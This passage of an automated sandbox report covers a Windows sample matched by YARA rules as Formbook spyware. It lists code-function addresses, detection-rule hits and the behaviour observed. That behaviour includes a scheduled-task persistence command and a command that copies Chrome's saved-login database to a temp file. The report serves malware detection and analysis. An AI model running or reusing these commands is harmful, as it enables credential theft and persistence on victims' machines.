          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01ABEBB03_2_01ABEBB0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01B4DBD23_2_01B4DBD2
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01B403DA3_2_01B403DA
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01B52B283_2_01B52B28
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AAAB403_2_01AAAB40
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01B522AE3_2_01B522AE
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01B3FA2B3_2_01B3FA2B
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AB25813_2_01AB2581
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01A9D5E03_2_01A9D5E0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01B525DD3_2_01B525DD
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01A80D203_2_01A80D20
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01B52D073_2_01B52D07
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01B51D553_2_01B51D55
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01A9841F3_2_01A9841F
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01B4D4663_2_01B4D466
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01B51FF13_2_01B51FF1
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01B5DFCE3_2_01B5DFCE
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01B52EF73_2_01B52EF7
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01AA6E303_2_01AA6E30
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: 3_2_01B4D6163_2_01B4D616
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A320A010_2_04A320A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04AD20A810_2_04AD20A8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A1B09010_2_04A1B090
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04AC100210_2_04AC1002
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A1841F10_2_04A1841F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A3258110_2_04A32581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A1D5E010_2_04A1D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A00D2010_2_04A00D20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A2412010_2_04A24120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A0F90010_2_04A0F900
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04AD2D0710_2_04AD2D07
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04AD1D5510_2_04AD1D55
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04AD22AE10_2_04AD22AE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04AD2EF710_2_04AD2EF7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A26E3010_2_04A26E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04A3EBB010_2_04A3EBB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04AD1FF110_2_04AD1FF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04ACDBD210_2_04ACDBD2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04AD2B2810_2_04AD2B28
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00742D9010_2_00742D90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00742D8810_2_00742D88
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00749E4010_2_00749E40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00749E3C10_2_00749E3C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00742FB010_2_00742FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04A0B150 appears 35 times
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeCode function: String function: 01A8B150 appears 72 times
          Source: xxgTjC4efAMDXvr.exe, 00000000.00000002.229521186.0000000005D40000.00000002.00000001.sdmpBinary or memory string: originalfilename vs xxgTjC4efAMDXvr.exe
          Source: xxgTjC4efAMDXvr.exe, 00000000.00000002.229521186.0000000005D40000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs xxgTjC4efAMDXvr.exe
          Source: xxgTjC4efAMDXvr.exe, 00000000.00000002.226254725.0000000003DC9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs xxgTjC4efAMDXvr.exe
          Source: xxgTjC4efAMDXvr.exe, 00000000.00000002.226254725.0000000003DC9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamepF vs xxgTjC4efAMDXvr.exe
          Source: xxgTjC4efAMDXvr.exe, 00000000.00000002.224274435.00000000027C0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameHutaba.dll, vs xxgTjC4efAMDXvr.exe
          Source: xxgTjC4efAMDXvr.exe, 00000000.00000002.229280780.0000000005C40000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs xxgTjC4efAMDXvr.exe
          Source: xxgTjC4efAMDXvr.exe, 00000000.00000002.228765539.0000000004E30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs xxgTjC4efAMDXvr.exe
          Source: xxgTjC4efAMDXvr.exe, 00000003.00000000.223005615.000000000103C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamepF vs xxgTjC4efAMDXvr.exe
          Source: xxgTjC4efAMDXvr.exe, 00000003.00000002.263115124.0000000001B7F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs xxgTjC4efAMDXvr.exe
          Source: xxgTjC4efAMDXvr.exe, 00000003.00000002.263565376.0000000001EB9000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMMON32.exe` vs xxgTjC4efAMDXvr.exe
          Source: xxgTjC4efAMDXvr.exeBinary or memory string: OriginalFilenamepF vs xxgTjC4efAMDXvr.exe
          Source: 00000003.00000002.260048280.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.260048280.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.260492658.0000000001510000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.260492658.0000000001510000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.226254725.0000000003DC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.226254725.0000000003DC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.476303103.0000000000BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.476303103.0000000000BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.476424827.0000000000BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.476424827.0000000000BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.260413976.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.260413976.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.475886802.0000000000740000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.475886802.0000000000740000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.226169941.0000000003CE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.226169941.0000000003CE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/8@4/4
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeFile created: C:\Users\user\AppData\Roaming\EURYWhTdx.exeJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6660:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5788:120:WilError_01
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeFile created: C:\Users\user\AppData\Local\Temp\tmp3977.tmpJump to behavior
          Source: xxgTjC4efAMDXvr.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: xxgTjC4efAMDXvr.exeReversingLabs: Detection: 22%
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeFile read: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe 'C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\EURYWhTdx' /XML 'C:\Users\user\AppData\Local\Temp\tmp3977.tmp'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\EURYWhTdx' /XML 'C:\Users\user\AppData\Local\Temp\tmp3977.tmp'Jump to behavior
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeProcess created: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /VJump to behavior
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeFile written: C:\Users\user\AppData\Roaming\L6725004\L67logri.iniJump to behavior
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: xxgTjC4efAMDXvr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
          Source: xxgTjC4efAMDXvr.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmmon32.pdb source: xxgTjC4efAMDXvr.exe, 00000003.00000002.263552372.0000000001EB0000.00000040.00000001.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: xxgTjC4efAMDXvr.exe, 00000003.00000002.263552372.0000000001EB0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: xxgTjC4efAMDXvr.exe, 00000003.00000002.263115124.0000000001B7F000.00000040.00000001.sdmp, cmmon32.exe, 0000000A.00000003.260186371.00000000046B0000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: xxgTjC4efAMDXvr.exe, cmmon32.exe
          Source: Binary string: mscorrc.pdb source: xxgTjC4efAMDXvr.exe, 00000000.00000002.228765539.0000000004E30000.00000002.00000001.sdmp

          Data Obfuscation:

          bar